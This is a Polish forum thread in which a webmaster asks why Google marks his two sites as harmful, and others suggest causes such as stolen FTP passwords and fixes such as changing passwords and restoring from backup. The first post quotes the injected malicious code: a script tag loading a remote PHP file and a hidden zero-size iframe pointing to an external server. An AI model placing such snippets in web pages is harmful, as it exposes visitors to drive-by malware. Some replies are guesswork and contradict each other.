Ta witryna może wyrządzić szkody... [ help ]

[foxhunt]

Witam

Dwie strony:

1) www.domywwieliczce.pl

2) www.podkasztanami-rudy.pl

Obie w wynikach wyszukiwania google maja status: "Ta witryna może wyrządzić szkody na Twoim komputerze"

Ja nie mam juz pojecia dlaczego tak sie dzieje. Walcze z tym czyms juz chyba ktorys miesiac. Poddaje sie. Plz help.

W przypadku pierwszej strony w kodzie html znajduje taki oto wpis:

<script src=https://hamnkrog.se/xmlrpc/LICENSE.php ></script><body><iframe frameborder="0" onload="if (!this.src){ this.src='https://dedlife.ru:8080/index.php'; this.height='0'; this.width='0';}" >srcayzzxdmlaiukfhbsbpeviehulrhg</iframe>

W przypadku drugiej strony znajduje taki oto fragment kodu:

<iframe frameborder="0" onload="if (!this.src){ this.src='https://dedlife.ru:8080/index.php'; this.height='0'; this.width='0';}" >eqvntawvohrzhuuhauoqayudiywhrho</iframe>

Ewidentnie to te właśnie wpisy szkodzą mojej stronie. Co robie?

Już wiele razy zgrywalem pliki index.php i index.html w ktorych to siedza owe dwie linijki kodu. Kasowalem ów linijki i wgrywalem spowrotem na serwer.

Jeśli w ogoel pomogło, to na parę dni. Po kilku dniach w narzedziach webmaster znow otrzymalem wiadomosc od google ze moja witryna szkodzi i znow w wynikach wyszukiwania pojawil sie odpowidni napis ostrzegający.

Ludzie ratunku. Jak sie tego mozna pozbyc raz na zawsze? skad to sie wzielo?

Czytalem ze rozne cmsy, skrypty itp. na licencji Open Source są pełne dziur. W przypadku strony numer dwa restauracja pod kasztanami zastosowalem cute news - bezplatny system newsow. Jesli to przez niego dodaje sie ta linijka kodu chetnie wywale ten system newsow. Ale czy to na 100% przez to? No bo w pierwszej stronie domy w wieliczce, nie ma tam zadnego uzytego skrypu open source.

Czy ktos moze na to spojrzec i mi pomoc? Bo ja już nie mam pomyslow ani sily na to

[fibonacci]

Po pierwsze - nie używaj Total Commandera - to przez niego (alternatywa: FileZilla).

Po drugie - zmień hasło na serwerze.

Pozdrawiam

fibonacci

[foxhunt]

Prawdę mowiac to specjalnei instalowalem total commandera. Wydawalo mi sie ze to program jestem z lepszych itd. ciekawa teoria ze to przez niego. A konkretniej cos?

[Komar]

Możliwe, że wykradziono z Twojego komputera plik z ustawieniami TC - m.in. znajdują się tam profile połączeń ftp.

[fibonacci]

Napisałem niekonkretnie?

[arkady65]

Po pierwsze - nie używaj Total Commandera - to przez niego (alternatywa: FileZilla).

Po drugie - zmień hasło na serwerze.

Pozdrawiam

fibonacci

Generalnie na pewno nie jest winien total comander no chyba, że scrakowałeś sobie go aby mieć ful wersje - wtedy jest taka możliwość, że w craku był trojan który przykleja ifreme do plików. Znalazłeś przyczynę wywal to /zapewne jeżeli crakowaleś TC bedzie przyklejone w każdym pliku / i powinno być ok

[fibonacci]

No nic, bawcie się dzieci dalej...

Dziękuje za uwagę.

[ravau]

fibonacci, u mnie to nie pomoglo (filezilla, zmiana hasla) i ciagle mnie to meczy

[dave84]

Bo Filezilla nic nie da, nie wiem w czym ma być lepsza od TC...ja używałem, nie zapamiętywałem haseł i iframe był jakoś.

Przeskanuj kompa, wywal iframe, zmień hasła i zmień na nowego tc z hasłem głównym.

[klikers]

Gdy wirus wgra się już na stronę, sama zmiana haseł raczej nie pomoże.

Wirus gdzieś wgrywa na serwer kod, który cały czas będzie dodawać tego iframe.

Najlepszym rozwiązaniem jest oprócz zmiany haseł, skasowanie plików z serwera i wgranie ich z czystego backupu.

[zakręcony]

Bo Filezilla nic nie da, nie wiem w czym ma być lepsza od TC...ja używałem, nie zapamiętywałem haseł i iframe był jakoś.

Przeskanuj kompa, wywal iframe, zmień hasła i zmień na nowego tc z hasłem głównym.

Ja miałem TC, hasełka w środeczku, w końu antywira mialem (nodzik)... Załapałem to badziewie z jakiegoś katalogu gdy sprawdzałem, czy wpisy weszły...

Zmiana haseł > Wywalenie TC (w sensie jest teraz wyłacznie managerem plików, a nie klientem ftp) > Instalka FileZilli (tym razem haseł nie przechowuję w programie) > Czyszczenie wirusów i mam spokój...

W 2 przypadkach wirusik wszedł ponownie:

- hasła w TC używanego przez Klienta, po wywaleniu TC mam spokój

- na hostingu był bug i główne hasło (to z rejestracji) było aktywne nawet po jego zmianie na nowe, po naprawieniu buga mam spokój

[outofmatrix]

Polecam forum:

Wirusy

Szybko, sprawnie i na temat.

[arkady65]

No nic, bawcie się dzieci dalej...

Dziękuje za uwagę.

Nie nazywaj innych dzieciakami bo sam nim jesteś, sama zmiana klienta w tym wypadku nic nie da, bo facet ma wirusa na bank. Ja używam TC od zawsze i nie mam problemów, większość osób używa i też nie ma problemów. Jeżeli zrobi to co mu napisali to będzie ok.

[domoweseo]

To nie Total tylko użytkownik. Ma pewnie wirusa który "słucha" i przechwytuje hasła FTP wprost z transferu. Na takie coś żaden program do ftp nie pomoże bo i tak wszystko wyłapie. Dobry antywir i po kłopocie.

[ravau]

u mnie to scierwo musi sie na serwerze rozpowszechniac, gdyz komp przekanowany, hasel nie zapamietuje.